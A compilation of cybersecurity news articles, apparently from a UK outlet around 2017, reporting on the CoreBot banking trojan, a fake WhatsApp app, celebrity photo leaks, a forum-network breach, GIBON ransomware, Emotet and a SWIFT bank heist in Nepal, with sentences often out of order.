What is CoreBot? Nefarious banking trojan resurfaces to target customers using malicious spam emails
Researchers said initial analysis of the new CoreBot variant seemed to suggest that it is related other active banking malware campaigns. Security researchers have discovered the sophisticated banking trojan CoreBot is making a comeback to target online banking customers via phishing emails. Customers of several Canadian banking websites including TD, Des-Jardins, RBC, Banque National and Scotia Bank have been targeted with phishing emails carrying the new malicious payload designed to steal their credentials, ZDNet reports. However, researchers at Deep Instinct noticed a new, modified variant of the malware is being distributed via malicious spam emails with Microsoft Office documents attached. The creators of the CoreBot malware also seem to have shifted the command and control domain server to a different IP address since the last campaign. The documents contained VBA scripts which users were tricked to run, leading to the payload being downloaded and executed,” Deep Instinct researchers Tal Leibovich & Shaul Vilkomir-Preisman said in a blog post on Wednesday (1 November), noting that the latest campaign seemed to have begun on Tuesday. He also noted that hackers often refurbish old malware code to include new evasion techniques, new C&C structure and more rather than create new malicious software from scratch. To make an old attack like CoreBot effective again, you simply have to make changes to the key indicators of compromise that would give it away,” Tony Rowan, chief security consultant at SentinelOne, told SC Media UK. It’s much easier and cheaper than building a new attack from the ground up,” he said. The phishing email appears to thank the user for their “prompt payment” and contains a “View Invoice” link that once clicked initiates the download of the malicious payload.
Watch out for this fake version of WhatsApp found lurking on Google Play Store
A fake and potentially malicious application has been discovered on the official Google Play Store posing as WhatsApp Business – and has been downloaded up to 5,000 times. The software posing as WhatsApp Business later changed its name to Update Whatsapp (sic) and has already attracted numerous user complaints revolving around pop-up ads. If granted, according to the app’s Google Play page, it will be able to receive data from the internet, view network connections, have full network access, control vibration and prevent the device from sleeping. According to the company, it will enable users to “have a business presence on WhatsApp, communicate more efficiently with your customers, and help you grow your business. It added: “Check only official channels to download WhatsApp Business in future. WhatsApp Business is not officially available yet for all,” the WABetaInfo social media account tweeted to its 30,000 followers. Users will be able to create business profiles and use messaging and call features to stay in closer contact with potential customers, ultimately extending the service’s social network features. At the time of writing, the software is still available for download. The existence of the dodgy software was first highlighted by the popular WhatsApp change tracking website WABetaInfo, via Twitter user @MujtabaMHaq. Unfortunately for unwitting Android users, this was an official channel.
Hackers leak WWE star Paige’s explicit photos and WhatsApp chat
Hackers have reportedly leaked explicit photos and selfies of the WWE star Paige, along with WhatsApp conversations with WWE wrestler Xavier Woods. For the second time in a year, private photos and WhatsApp conversations of WWE diva Paige have been leaked by unknown hackers. It is still unclear if the hackers behind the more recent leaks are part of the same cybercriminal group that leaked nude photos of numerous celebrities in 2014. Private photos of WWE ring announcer Jijo have also reportedly been leaked by the same hackers. In March, Paige confirmed that her phone had been hacked and private photos were stolen. The hackers have threatened to leak more content in the coming days, Hackread reported. The new leaks come soon after the third so-called “Celebgate” or “Fappening” hacker Emilio Herrera, 32, was charged with hacking into over 550 celebrities Gmail and iCloud accounts. Hollywood actresses – including Jennifer Lawrence, Kirsten Dunst, Kate Upton, Kim Kardashian and others – were among those affected by the hack. She was among a whole host of high-profile celebrities, including A-listers such as Emma Watson, Amanda Seyfried, Mischa Barton and others, whose nude photos were published online. The British wrestler Saraya-Jade Bevis, who goes by the name Paige, was targeted by hackers earlier in March in what was dubbed as “Fappening 2.
Verticalscope hacked again: At least 2.7 million accounts compromised in second major data breach
In June 2016, Verticalscope admitted that it had suffered a data breach that saw at least 45 million user accounts compromised and their data leaked in a blog post on Leakedsource. Similar to Leakedsource, LuiDB allows registered users to search for account details associated with any data element compromised in a breach — such as login, password, email, first/last name and Internet address,” Krebs noted. Krebs reported that a simple search on one of Verticalscope’s compromised domains led to a series of Pastebin posts that have since been deleted “suggesting that the individual(s) responsible for this hack may be trying to use it to advertise a legally dicey new online service called LuiDB. That was before he contacted one of the hackers selling the data and was given screenshots indicating that Verticalscope. Security researcher and founder of Hold Security, Alex Holden, notified Krebs last week that hackers were selling access to Verticalscope. With a Web shell installed on a site, anyone can remotely administer the site, upload and delete content at will, or dump entire databases of information — such as usernames, passwords, email addresses and Internet addresses associated with each account. The hackers reportedly obfuscated certain details in the screenshots that allowed him to locate at least two backdoors on Verticalscope’s website and Toyotanation. The intrusion granted access to each individual website files,” Verticalscope said in a statement to Krebs. IBTimes UK has reached out to Verticalscope for further details. com and several other properties were in fact compromised with a backdoor known as a ‘Web shell’,” Krebs wrote
Dark Web hackers selling GIBON ransomware for $500
A new ransomware variant dubbed GIBON is now reportedly being sold by cybercriminals on the dark web for $500 (£380). The ransomware was uncovered last week and was reportedly found actively being distributed via a phishing campaign. GIBON functions as any other traditional ransomware, decrypting victims’ data and demanding a ransom. An advert for the ransomware on dark web allegedly claims that it is impossible to decrypt. However, this is not true. Fortunately, a decryptor for GIBON is already available, Bleeping Computer has reported. Cybercriminals allegedly began selling GIBON in May. However, apart from last week’s campaign, there appears to be little activity. This may indicate that the ransomware may not have been sold to many people. The ransomware may have ties to Russia, ZDNet reported. GIBON’s logo is reportedly based on a logo design of a Russian television firm. The instructions to victims on how to go about making ransom payments also include directions to contact a bunch of Russian (mail.ru) email addresses. Bleeping Computer reported that the advertisement for GIBON is also available in Russian, alongside translated copies. This indicates that the ransomware’s operators may be Russian. In the wake of the recent historic takedown of AlphaBay and Hansa – two of the largest and most prominent dark web markets, the underground cybercrime community appears to be devolving. Some dark web administrators in the Russian cybercrime community in particular, have previously expressed concerns over the increased attention the dark web now appears to get from law enforcement authorities. Last month, four major dark web markets including Dream Market and Tochka went mysteriously offline, sparking fears of a potential police crackdown.
Two banking Trojans that can plunder your accounts are on the rise, Microsoft warns
The use of two notorious strains of banking Trojan that are able to silently infect computers, steal login details and empty accounts have spiked in recent months, Microsoft warns. Microsoft released a number of key tips so users can stay protected against the threat: Cut off internet access or disconnect the affected computers from the network until cleaned. Emotet was first discovered to be a major banking Trojan threat by security firm Trend Micro back in 2014. $280m in cryptocurrency ‘lost’ amid security scare According to a blog post published Monday (6 November), some of the new strains in use by hackers have worm-like capabilities that let them quickly spread across infected computer networks. The threat to information is greater than ever,” Microsoft warned, also showing statistics indicating that home internet users make up a large chunk of the target demographic for the culprits. Cybersecurity expert Joie Salvio wrote at the time: “What makes this malware, detected as Emotet, highly notable is that it ‘sniffs’ network activity to steal information. Experts found that – like WannaCry – it could take advantage of a Windows OS protocol known as Server Message Block (SMB) to “drop copies” of the malware onto linked computers. Remove unnecessary privileges, or disable privileged accounts that have been observed to spread malware using SMB. Qakbot and Emotet monthly machine encounters show an upward trend Microsoft. Update all security software on your computer system as soon as possible.
WWE Fappening leaks continue: Stolen nude snaps of divas JoJo and Maria Kanellis posted online
Sexual images of two more female WWE stars – Maria Kanellis and Joseann ‘JoJo’ Offerman – appear to have been leaked online, reportedly after being stolen by hackers. Wrestler and model Maria Kanellis attended the Spring 2009 Mercedes-Benz Fashion Week held at Smashbox Studios on October 16, 2008 in Culver City, California Katy Winn/Getty Images Cybersecurity experts have warned that any images uploaded or stored online can be vulnerable to hackers. In recent years, a number of men have faced prosecution for hacking into the personal online accounts of Hollywood celebrities. This year there have been numerous leaks involving personal, often sexual, pictures of famous women – including Dakota Johnson, Emma Watson and Miley Cyrus. Mark James, a security expert at ESET, said: “Time and again we hear stories that someone’s personal photos or intimate life has been leaked through a hack, data breach or password reuse. Not all are hacks, of course, some are simply having the right credentials to log in and gain access just like the owner, but every time it happens, people have to ask themselves – how private are our online accounts. 0″ leak of celebrity pictures earlier this year, has claimed more WWE-focused disclosures are on the horizon. Kanellis was named in the previous batch of leaked nude images and has also been embroiled in sex tape rumours. Personal and private photos of mine were stolen and unfortunately, they were shared publicly without my consent,” Paige wrote on Twitter at the time of the leak. Paradise Papers: Appleby says media has ‘clear political agenda’ as scandal swirls “These are just the preliminary Maria leaks,” the website wrote under of the latest entries, adding: “We will update this page as more become available.
Hackers steal $4.4m from Nepal bank in cyber-heist by abusing Swift network
North Korean worldwide hacking rampage steals millions from casinos and banks NIC Asia Bank, one of the largest private sector commercial institutions in the region, brought in experts from the country’s central bank – Nepal Rastra Bank (NRB) – and a probe was conducted by KPMG India. Officials from the NIC Asia Bank, based in Kathmandu, the capital city of Nepal, have been scrambling in recent weeks to recover from a hack on its computer networks, which abused the Swift financial messaging system to help steal approximately $4. In February 2016, hackers stole $81m from the Bangladesh central bank by using malware to infiltrate its network. The hackers abused the SWIFT network to steal cash Markus Spiske/Unsplash “We subsequently share relevant information on an anonymised basis with the community. Swift, or the Society for Worldwide Interbank Financial Telecommunication, is a global financial network used by more than 10,000 banks to send and receive cash transfers. This is not the first time Swift has been exploited by hackers to steal large chunks of cash. We have already requested the central banks in those countries to stop processing payments to the parties requested by the hackers,” NRB spokesperson Rajendra Pandit said at the time. Research suggests that the rogue nation increasingly uses cybercrime and computer hacking as a source of revenue, targeting casinos, banks and cash machines across the world. Pushkar Karki, a police chief at the Central Investigation Bureau (CIB), confirmed to local media that the payment order was placed by hacking the bank’s own systems. According to the Himalayan Times, six staff members who were responsible for handling the Swift terminal have been moved to other departments as the probe continues.
UFC fans beware! The Fight Pass website may be secretly hijacking users’ PCs to mine Monero
Information & cyber ‘insecurity’ top risk in India for 2017
Pinkerton’s India Risk Survey 2017 puts information and ‘cyber insecurity’ at the top of the list for risk ratings this year, topping out terrorism risk, business espionage, intellectual property theft and accidents. India is undergoing a phase of ‘information and cyber insecurity’ as it moves towards asset digitization and service delivery, the report says. The report says that the increasing number of cyber attacks and cyber espionage require stronger investment in the security of cyberinfrastructure. “While the WannaCry ransomware was attempting to penetrate into the Indian cyber-domain, the country was put on highlight and official sources have declared that India was not as affected as reported. ” Although there are high costs associated with cybersecurity enhancement, the implications from weak security will be even higher. Information and cyber insecurity will also remain the top business risk for a number of years. Information and cyber insecurity is not the top risk across all of India’s sectors, however. 7 percent of cyber-related crime (under the IT Act),” the report says. The report suggests that training sessions can reduce human error, and business and government cooperation can boost security. Several corporations, such as the Power Grid Corporation of India Limited (PGCIL), were ready to block the malware by setting up a precautionary firewall,” the report says.